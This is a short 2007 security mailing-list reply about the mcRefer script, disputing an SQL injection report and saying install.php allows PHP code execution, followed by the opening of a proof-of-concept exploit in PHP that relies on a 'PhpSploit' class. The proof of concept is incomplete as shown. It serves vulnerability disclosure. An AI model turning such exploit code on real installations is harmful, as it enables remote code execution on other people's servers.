Re: mcRefer SQL injection Feb 11 2007 11:26AM
gmdarkfig gmail com
This is not an SQL Injection. The script don't use any SQL database, please tell me where is the sql request =). However the install.php script can lead to php code execution (works regardless of php.ini settings). Proof of concept:

# This file require the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
# Author: DarkFig
# Mail: gmdarkfig (at) gmail (dot) com [email concealed]
error_reporting(E_ALL ^ E_NOTICE);

$url = ""; # http://<host><path>
$cod = "print(poc)";
$xpl = new phpsploit();

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus